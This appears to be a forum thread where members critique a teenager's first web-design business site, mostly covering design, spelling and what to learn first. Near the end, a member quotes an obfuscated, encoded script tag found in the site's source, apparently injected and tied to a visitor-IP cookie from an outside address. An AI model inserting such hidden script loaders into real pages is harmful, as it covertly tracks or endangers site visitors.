• jubilaki
  • Graduate
  • Graduate
  • Loc: australia

Post 3+ Months Ago

hi i am new to web building
this site is for the biusness that i'm starting

http://www.polabear.tk

please be as honest as possible i would like to know what i should change etc all comments of all kinds are welcome
  • Anonymous
  • Bot
  • No Avatar
  • Loc: Ozzuland

Post 3+ Months Ago

• Cool#9
  • Graduate
  • Graduate
  • Loc: Québec

Post 3+ Months Ago

Where you sober when you designed that site? Or you got bitten by a funnel web spider? :wink:

Look I’m not saying that when my time comes to get reviewed I will get 10 out of 10,
but for you site in this moment I have to give you only 1/10,
the 1 point is for the effort and the guts to get reviewed,
you need allot of work mate, most letters are very hard to read,
the colors are…well maybe its personal but I don’t like the mix,
the scrolling thing there…blah! I really don’t know what’s the use?
But eh! If you like it it’s your business.
Keep up the work who knows? :)
  • Tone2k11
  • Proficient
  • Proficient
  • Tone2k11
  • Loc: Southampton - UK

Post 3+ Months Ago

Your site needs a lot of work done to it. You should have a look at other website design sites. If you are looking to get customers then your site needs to be top notch. If i was looking for someone to design a site for me and then happened to come accross your site i would run a mile.

Your site should reflect what your company is capable of.

The font is not very clear on that background and you hqve also used quite a boring font.

The copy-right does not fit into to side part.

I dont like the mouse tracker, It just annoys me and does not look very professional.

Overall i would also have to rate your site 1/10

It can however be improved so dont let this negative comment put you off. You will get better as time goes by so keep trying and learning.

Try introducing graphics, better colours. have you got any image software like paintshop pro or photoshop? if not then it might be worth purchasing something along them lines.
  • gsv2com
  • Professor
  • Professor
  • Loc: Nippon

Post 3+ Months Ago

Tone2k11 wrote:
Your site should reflect what your company is capable of.

Not trying to be a meanie, but I think this site does reflect what his company is capable of.

Learn html, css, and get a better grasp on design. Take some time before you get into the business of doing websites. I don't think you're ready just yet.

I mean really--what can you bring to the table? What makes you better than the average designer? First, work on your own site. Then you'll be ready for others. Give it a year or so. At least you've got your own web address to work with.
  • barmybint
  • barmybint
  • Loc: UK

Post 3+ Months Ago

Errmm...there's not an awful lot to review is there? I'm afraid to say that I agree with everyone else and would also add that you have LOTS of spelling mistakes which looks very unprofessional. Keep working though!

Barmy x
  • musik
  • Legend
  • Super Moderator
  • Loc: up a tree

Post 3+ Months Ago

(I have to just interject here and point out that jubilaki is a nice 14yo kid from Oz... you know youthful enthusiasm and all that, so please be specific in your critique of his website and not demeaning, were not here to shoot up peoples self esteem, were here to suggest how people can make their sites better).
  • joebert
  • Fart Bubbles
  • Genius
  • Loc: Florida

Post 3+ Months Ago

Well said Rose.

jubilaki, your thinking too far ahead. You seem to understand the basics of advertising (I liked the left handed polarbear catch phrase), yet you obviously lack in design experience. Most of the people that own web design companys have been doing this for MANY years.

My advice, focus on learning standard coding practices, I noticed META name="generator" content="Notepad" in your pages source so it seems you know a little about tweeking the source of a page :wink:
OZZU is full of threads with very helpfull links to sites that I suggest you READ NOT SKIM THROUGH. Any time you have questions OZZU is also full of thoose people that have been doing this for many years that I told you about earlier. (As i'm sure you've figured out allready)

Getting to the review,
Overall i'm going to have to give this site a 2/10
  • Cool#9
  • Graduate
  • Graduate

Post 3+ Months Ago

WTF are you talking about musik?
no one here treated him as a stupid or anything else for that matter, we all gave our opinion like he asked,
Quote:
please be as honest as possible i would like to know what i should change etc all comments of all kinds are welcome

We all gave him a “ continue or keep up the work” statement at the end of our review, so you can see theirs a great sense of solidarity in all the posts, I personally think that you, you are the one out of topic here,
why don’t you give a review to him instead of saying none sense things. WTF do you know how we feel about it eh!
THE END FOR ME WITH YOU.
  • musik
  • Legend
  • Super Moderator

Post 3+ Months Ago

It was a general comment and related to nobody in particular, if you feel that it was directed at you then maybe you need to have a think about why you perceive it that way.

I also think you need to check your manners and watch your attitude.
  • gsv2com
  • Professor
  • Professor

Post 3+ Months Ago

Though I have a lot of respect for all of you moderators, I think cool#9 and all others who disagree with your post are right on the money. We're not out to lower this kid's self esteem but to give him a push in the right direction.

If he doesn't take the time to work on his own site he'll never be ready to help someone else, and he might find himself in a big, bad dilemma if somebody DOES take his site seriously and then tells him they need--for instance--an e-commerce website to sell thousands of products with a database backend and an admin section to enable the buyer to update products himself.

If you're a novice, then web development can be a challenge, but if you're a beginner then you shouldn't be getting into web design as a business. Not yet at least.

I agree that cool#9 should check his manners at the door but I do agree with his sentiment that you were off-topic. But this is the web. It's easy to misinterpret what others mean, so we might both be wrong.

Either way, good luck with polabear jubilaki. 14 is a good age to get into web design. When you're 21, you'll probably be forcing somebody my age out of a job! :)
  • musik
  • Legend
  • Super Moderator

Post 3+ Months Ago

I respect your honesty gsv2com. Like I already said it was not aimed at anyone in particular however I felt that I should clarify jubilaki's status should anybody judge his efforts too harshly (seeing as he said it was his web design business website).

Maybe its the over protective youth worker in me, I didn't post it to step on anybodys toes :)

Cheers,
Rose
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

thanks for all the sugestions i know that i'm not very good at the moment
i am only 14 and that is like the second site that i have built
i posted the site here so that hopefully i could get some ideas and help from all you guys that have been doing this for years
i'm just learning to use flash and so i'll put some of that up soon
thx muskit for ya support

thx all for all your comments
  • gsv2com
  • Professor
  • Professor

Post 3+ Months Ago

No! No flash! Master html first! Otherwise you'll just end up with flash knowledge and little idea of how the web works. Master html and css, then learn flash. Flash by itself has very little value and too many beginners get into such terrible habits by using flash for everything. Use it for banners, cool effects, and whatnot, but leave the presentation to html and css unless you're looking to be like http://www.joecartoon.com someday.

This is, of course, just my biased opinion. Flash sucks! :)
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

ok then i've got html under control but i haven't even looked at css i started with php what should learn first php or css
and if css where is a good tutorial
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

lol in class me teacher is trying to get me to use flash but he dosnt know how do use it himself
  • Cool#9
  • Graduate
  • Graduate

Post 3+ Months Ago

musik wrote:
Maybe its the over protective youth worker in me, I didn't post it to step on anybodys toes

Well I’m sorry for being rude musik, I got mad because i personally know that i was saying only good stuff to the guy, and so the other’s, your words, even if spoken in general, i think it was not reflecting my opinion, and as you can see for other’s too in this thread.
Well maybe now that we know each other a tiny bit more, and you can see that we all have good intention,
I’m ready to bury the hatchet,
so again I’m sorry MUSIK, I’m sorry, sorry, sorry! :oops:

jubilaki wrote:

lol in class me teacher is trying to get me to use flash but he doesn’t know how do use it himself

After almost 3 months of trying I gave up on Flash (for now), it is a bit hard because you need to know the coding first,
It seems easy when you see it in a well prepared page, but boy it’s hard, so I am doing first normal pages, but if you want a business I do recommend the same as gsv2com said, first html and after flash.
Good luck mate!!! :wink:
  • gsv2com
  • Professor
  • Professor

Post 3+ Months Ago

Learn CSS first. It'll only take a few days of study to get a pretty firm grasp. PHP is more complex. It is a programming language after all. CSS is just for style. It'll make your html coding and web maintanence a lot easier.

Get "Eric Meyer on CSS" at any large bookstore with a computer section or order it from Amazon. Do a search on Google for CSS tutorials and you should be able to learn a bit.

Ask us questions if you need help. I love CSS. I'll be happy to help anytime.
  • gsv2com
  • Professor
  • Professor

Post 3+ Months Ago

I understand what you're saying about learning flash for three months cool#9. I did the same. I got a ball to bounce, but that's about it. *sarcasm*

Can I call you Ice-9? Much cooler name and easier to type. :) If you're not sure what Ice-9 is, it's the chemical that brought about the end of the world in Kurt Vonnegut's book Cat's Cradle.
  • Cool#9
  • Graduate
  • Graduate

Post 3+ Months Ago

Ice-9, cool#9, is all Joe Satriani’s song titles, it’s my favorite instrumentalist, I never expected that Ice-9 was other than is song title, well good to know other stuff, now I’m going to ask Joe if he got the idea from Kurt Vonnegut's, wonder???

For the Flash thing, well you got the ball to bounce, me I just got a circle to “tween” from one end to another. ;)

I went on your site and let me tell you it sure does groove, nice! To bad am not going to Japan soon, I wish!!!
  • gsv2com
  • Professor
  • Professor

Post 3+ Months Ago

Cool#9 wrote:
I went on your site and let me tell you it sure does groove, nice! To bad am not going to Japan soon, I wish!!!

Japan's party scene is lacking, but I'd say the coolest thing about Okinawa's party scene is the GrooveSeeker website. As far as the actual party/club scene is concerned out here: it's lacking. Okinawans are far too laid back.
  • joebert
  • Fart Bubbles
  • Genius

Post 3+ Months Ago

One question jubilaki, Why are you storing visitors IP addresses in a cookie named IP ?
  • elcunto
  • elcunto

Post 3+ Months Ago

Like IT!!
  • musik
  • Legend
  • Super Moderator

Post 3+ Months Ago

Cool#9 wrote:
Well I’m sorry for being rude musik, I got mad because i personally know that i was saying only good stuff to the guy, and so the other’s, your words, even if spoken in general, i think it was not reflecting my opinion, and as you can see for other’s too in this thread.
Well maybe now that we know each other a tiny bit more, and you can see that we all have good intention,
I’m ready to bury the hatchet,
so again I’m sorry MUSIK, I’m sorry, sorry, sorry! :oops:

Cheers Cool, the hatchet is buried and gone :D

:thumbsup: (thank you)
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

joebert where and how am i doing this i have no idea how or where i'm storing the ip's
  • UniquelyYoursPC
  • Web Master
  • Web Master
  • Loc: Canada "A"

Post 3+ Months Ago

i just looked at your site and you want to have a Web Design biusness did you look at your site? you would think if you owned a Web Design biusness you would have at leat a good website. i was not that bad when i frist started. i am sorry but 2 thumbs down

now to help you out a bit. get rid of the background and the scrolling, make it more center, add to it, make the table border="0" becouse that looks real bad get more clour on you site but dont make it to flashy. i hope you take some of my ideas.
  • joebert
  • Fart Bubbles
  • Genius

Post 3+ Months Ago

While I was weeding through exported cookies I noticed one named IP with nothing but an ip address from http://www.andy.vzz I almost always watch my status bar while surfing and remembered this address from your site. I did a quick check and yep I wasn't mistaken, it came from your site as it is the only one I visited with http://www.andy.vzz in the address.
why it's there I dont know but im guessing it has somthing to do with this,
Code: [ Select ]
<script language='jscript.encode' src='/root/%61%64%73.php'></script>
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

not shur i'll have to have a look
  • artbydesign
  • artbydesign

Post 3+ Months Ago

Keep working on it... you've got some of the basics down and I'm sure you'll be a great designer. Heck... you're 14, and your 1st site looks better than mine did... (and I was 22) lol

A little helpful suggestion: try to make sure that the colors on your pages are pleasing to the eye, and that there is enough contrast between the text and the background color. Try to stay away from using Contradictory color combinations. Think of the color wheel (Red-Blue-Yellow) If the two colors are across from eachother... it's bound to give an unpleasing effect... (Red - Green, Blue - Orange, Yellow - Purple). In addition to that.. make sure that the color combinations are too closely related.. (Dark Blue - Dark Purple.... etc)

It takes practice, and contstructive critisizm helps, so don't be affraid to post your work for review. Keep with it, and by the time you're my age, you'll be bringin' in the big bucks!

Art
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

thx
  • jubilaki
  • Graduate
  • Graduate

Post 3+ Months Ago

i have changed some stuf and i have put css into it can someone tell me if it is any better than before please
  • Anonymous
  • Bot
  • No Avatar
  • Loc: Ozzuland

Post 3+ Months Ago

Post Information

• Total Posts in this topic: 74 posts
  • Moderator: Website Reviewers